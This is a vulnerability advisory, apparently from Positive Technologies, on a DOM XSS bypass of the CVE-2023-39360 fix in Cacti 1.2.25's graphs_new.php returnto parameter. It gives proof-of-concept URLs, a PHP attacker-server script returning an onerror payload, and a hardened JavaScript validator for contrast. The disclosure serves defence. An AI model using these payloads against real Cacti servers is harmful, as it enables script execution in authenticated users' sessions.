Cross-Site Scripting (XSS) DOM
Product: Cacti
Version: 1.2.25
Description: Bypass of an earlier fix (CVE-2023-39360) that leads to a DOM-based XSS attack.
Exploitation requires an authenticated user. The vulnerable component is graphs_new.php
(the returnto parameter). Impact: execution of arbitrary JavaScript in the attacked user's
browser, in the context of the Cacti origin.
Mitigation: Validate the returnto parameter before it is used (allow only same-origin Cacti
pages) rather than filtering individual characters from it.
Research
The report for the patched vulnerability (CVE-2023-39360) has been reviewed.
When the link from that report is opened in the browser, the attack no longer works,
because the fix filters certain special characters in the returnto parameter, for
example: ", ', (, ), <, >
Listing 1. PoC for the fixed vulnerability (CVE-2023-39360)
http://***.***.*.174:8080/cacti/graphs_new.php?returnto=javascript:alert(location.hash.substring(1))//host.php#XSS

Figure 1. Demonstration of the CVE-2023-39360 fix
However, there is still a way to perform a full-fledged DOM XSS attack: instead of embedding
JavaScript in the parameter, the attacker points returnto at a page on a server he controls.
First, the attacker places the following script on his server, http://***.***.*.87.
Listing 2. Placing the script on the attacker's server
<?php
// Allow any origin (including the Cacti site) to read this response from an AJAX request;
// without this header the browser blocks the cross-origin response and the success
// handler in Cacti never receives the body.
header('Access-Control-Allow-Origin: *');
// The response body is inserted into the Cacti page as HTML, so the onerror handler fires.
echo '<img src=1 onerror=alert(document.domain)>';
?>

Figure 2. Demonstration of the request-response from the attacker's server
Second, the attacker prepares the following link and sends it to the victim, a user of
***.***.*.174.
Listing 3. Link demonstrating the vulnerability (PoC)
http://***.***.*.174:8080/cacti/graphs_new.php?returnto=//***.***.*.87/index.php?//host.php

Figure 3. Display of the returnto parameter after clicking the link
Note that the payload contains none of the special characters that are filtered: it is a
protocol-relative URL (//host/path), which the character filter accepts, and the trailing
?//host.php simply becomes the query string of the attacker's URL. When the user clicks the
"Cancel" button, the cactiReturnTo function is called with the transmitted payload.

Figure 4. Calling the cactiReturnTo function with the link passed in the returnto parameter
In the cactiReturnTo function (line 731), the loadPageNoHeader function is called with the
user-supplied link as its argument.

Figure 5. Calling the loadPageNoHeader function, where the first parameter is controlled by the user
In the loadPageNoHeader function (line 2380), an AJAX request is made to the user-supplied
URL. Because the attacker's server responds with Access-Control-Allow-Origin: *, the browser
lets the page read the cross-origin response and the success handler runs. On lines 2382,
2396 and 2407 the response is inserted into the page with the dangerous jQuery .html()
function. .html() does not sanitize its argument, so the attacker's markup is parsed as HTML
and the onerror handler executes.
So, when the user clicks the "Cancel" button, a DOM XSS attack is performed in the user's
browser.

Figure 6. DOM XSS attack triggered by clicking the Cancel button
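The following is an added example and not Cacti's code. It places the character blocklist the advisory describes for the CVE-2023-39360 fix beside a hardened validator for a "return to" parameter that resolves the value against the application's own URL and keeps it only if it stays on the same origin, uses http(s) and names a known page. CACTI_BASE, ALLOWED_PAGES and the attacker host 203.0.113.87 are constructed for illustration; they are not the advisory's masked addresses. The validator also rejects two variants the advisory does not show (a backslash-prefixed authority and a path-traversal value), which the resolve-then-compare approach handles for free.

```javascript
// Added example (not Cacti's code): character blocklist vs. same-origin validation of returnto.
// CACTI_BASE, ALLOWED_PAGES and the host 203.0.113.87 are assumptions for illustration.

const CACTI_BASE = "http://cacti.example/cacti/graphs_new.php"; // assumed install URL

// 1. The fix as the advisory describes it: reject only values containing a blocked character.
const BLOCKED_CHARS = ['"', "'", "(", ")", "<", ">"];
function passesCharBlocklist(returnto) {
  return !BLOCKED_CHARS.some((c) => returnto.includes(c));
}

// 2. Hardened check: resolve the value against the Cacti page URL and keep it only if it
//    stays on the same origin, uses http(s) and ends in an allowlisted page name.
const ALLOWED_PAGES = new Set(["host.php", "graphs.php", "graphs_new.php"]); // assumed allowlist

function resolveReturnTo(returnto, base = CACTI_BASE) {
  let target;
  try {
    target = new URL(returnto, base); // relative values resolve against the Cacti page
  } catch {
    return null; // unparseable input: caller falls back to a fixed default page
  }
  // Catches //evil/..., http://evil/..., /\evil/... and javascript: (origin "null").
  if (target.origin !== new URL(base).origin) return null;
  if (target.protocol !== "http:" && target.protocol !== "https:") return null;
  const page = target.pathname.split("/").pop(); // pathname is already ..-normalized
  if (!ALLOWED_PAGES.has(page)) return null;
  return target.pathname + target.search; // same-origin path, safe to navigate to or fetch
}

function isSafeReturnTo(returnto, base = CACTI_BASE) {
  return resolveReturnTo(returnto, base) !== null;
}

// Constructed inputs: the original PoC, the bypass from this advisory, and legitimate values.
const ORIGINAL_POC = "javascript:alert(location.hash.substring(1))//host.php#XSS";
const BYPASS_POC = "//203.0.113.87/index.php?//host.php";
const LEGIT = "host.php";

// Run both checks on one value; the blocklist lets the bypass through, the validator does not.
function compareChecks(value) {
  return { blocklist: passesCharBlocklist(value), hardened: isSafeReturnTo(value) };
}
```

compareChecks(BYPASS_POC) returns { blocklist: true, hardened: false }: the protocol-relative URL passes the character filter but fails the origin comparison, while plain host.php resolves to /cacti/host.php and is accepted by both.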
Researcher: Aleksey Solovev (Positive Technologies)